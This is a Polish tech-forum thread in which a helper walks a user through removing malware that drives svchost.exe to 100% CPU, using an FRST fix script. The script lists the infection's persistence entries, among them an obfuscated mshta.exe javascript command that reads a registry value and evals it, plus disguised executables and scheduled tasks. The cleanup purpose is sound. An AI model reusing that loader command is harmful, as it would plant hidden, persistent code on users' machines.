Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Procesor - Problem z svchost.exe

Shars 07 Maj 2017 18:50 402 7
  • #1 07 Maj 2017 18:50
    Shars
    Poziom 3  

    Dzisiaj proces svchost.exe zaczął zżerać mi 100% procesora, po wyłączeniu całkowicie usługi Windows Update problem dalej występuje, co jest jego przyczyną jeżeli nie to? Proszę o pomoc.

    System - Windows 7 Ultimate

    0 7
  • #3 07 Maj 2017 19:06
    Shars
    Poziom 3  

    Czyżby wirus? Procesor - Problem z svchost.exe

    Uruchomiłem już pełne skanowanie systemu za pomocą Avasta, zaraz dodam logi z tego skanowania
    Po wyłączeniu procesu w menadżerze system stoi dalej, niema żadnych problemów.

    P.S. Jestem niemal pewny że to wirus, w właściwościach procesu absolutnie nic o nim nie pisze, teraz pytanie jak się tego pozbyć?

    0
  • #4 07 Maj 2017 19:11
    Kolobos
    Spec od komputerów

    Na to wyglada.

    Zamiesc logi z FRST jak juz bedziesz mogl.


    Ps. "Nie ma" nie pisze sie razem.

    0
  • Pomocny post
    #6 07 Maj 2017 19:19
    Kolobos
    Spec od komputerów

    Odinstaluj:
    Driver Booster 4.3
    Note-UP

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    Task: {0A1D4354-DD24-45B9-870A-F92862EC5225} - System32\Tasks\Driver Booster SkipUAC (Dawid) => C:\Program Files (x86)\IObit\Driver Booster\4.3.0\DriverBooster.exe [2017-03-16] (IObit)
    Task: {2A76FF12-9BBB-443A-8221-5442E4A0C174} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\4.3.0\Scheduler.exe [2017-03-10] (IObit)
    Task: {3839CA54-9030-44F4-BE04-DA5C5E40536D} - System32\Tasks\server => C:\Users\Dawid\AppData\Local\Temp/server.exe [2017-05-07] (Adobe System Incorporated.)
    C:\Users\Dawid\AppData\Roaming\Origin\update.vbs
    Task: {805B380E-6118-4A56-99E5-41FECB3134A0} - System32\Tasks\WindowsMediaSharing => C:\windows\wmsvr.exe [2017-04-27] ()
    Task: {AA6634BB-6B37-46EB-8F19-A9184CC5CF73} - System32\Tasks\Origin => C:\Users\Dawid\AppData\Roaming\Origin\update.vbe [2017-05-07] () <==== UWAGA
    Task: {CF9994CC-5F37-493C-8090-4838A561B9CE} - System32\Tasks\Microsoft\Windows\Setup\EOSNotify => C:\Windows\system32\EOSNotify.exe [2016-06-25] (Microsoft Corporation)
    C:\Windows\Temp\svchost.exe
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [432]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [432]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [432]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432]
    AlternateDataStreams: C:\Users\Dawid\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\Users\Dawid\Dane aplikacji:NT2 [432]
    AlternateDataStreams: C:\Users\Dawid\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Dawid\AppData\Roaming:NT2 [432]
    HKU\.DEFAULT\Software\Classes\91909: "C:\Windows\system32\mshta.exe" "javascript:jK4ZT="pg6p";AK10=new ActiveXObject("WScript.Shell");yZ5tO1="GP";SW8nL=AK10.RegRead("HKCU\\software\\zjyiq\\ybujffx");zMVWS9h6C="wEf2WP";eval(SW8nL);n93zZXZ="fAF";" <===== UWAGA
    HKU\S-1-5-21-1951144970-3711556307-2281899587-1000\...\Run: [b5b77ca3bcf909ddf66de9a4120ad15f] => C:\Users\Dawid\AppData\Roaming\Adobe System Update.exe .. [160083456 2017-04-30] (Adobe System Incorporated.)
    HKU\S-1-5-21-1951144970-3711556307-2281899587-1000\...\MountPoints2: F - F:\setup.exe
    HKU\S-1-5-21-1951144970-3711556307-2281899587-1000\...\MountPoints2: {59cf659b-2a7d-11e7-8503-806e6f6e6963} - E:\Autorun.exe
    FF user.js: detected! => C:\Users\Dawid\AppData\Roaming\Mozilla\Firefox\Profiles\t8fl7phq.default\user.js [2017-04-27]
    R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-04-27] (REALiX(tm))
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    2017-05-07 18:05 - 2017-05-07 18:05 - 00003470 _____ C:\Windows\System32\Tasks\server
    2017-05-07 18:05 - 2017-04-30 22:27 - 160083456 _____ (Adobe System Incorporated.) C:\Users\Dawid\AppData\Roaming\Adobe System Update.exe
    2017-05-07 17:49 - 2017-05-07 17:49 - 00003120 _____ C:\Windows\System32\Tasks\Origin
    2017-04-30 13:52 - 2017-04-30 13:52 - 00000000 ____D C:\Program Files (x86)\f8202a30-e381-45f4-b6c6-ed0571c417f21493553169
    EmptyTemp:

    W FRST wybierz Napraw.

    0
  • #7 07 Maj 2017 19:29
    Shars
    Poziom 3  

    Zdaje się że problem zniknął, ale strzele formata. Mam płytę, 30 min mnie nie zbawi a mam 100% pewności że nie ma żadnego keyloggera czy innego ustrojstwa. Dzięki za pomoc, do zamknięcia.

    0
  • #8 07 Maj 2017 19:51
    Kolobos
    Spec od komputerów

    Przeciez pisalem Ci, ze "nie ma" nie pisze sie razem, wiec dlaczego nadal robisz ten blad?

    Infekcja zostala usunieta, ale rob jak chcesz.

    0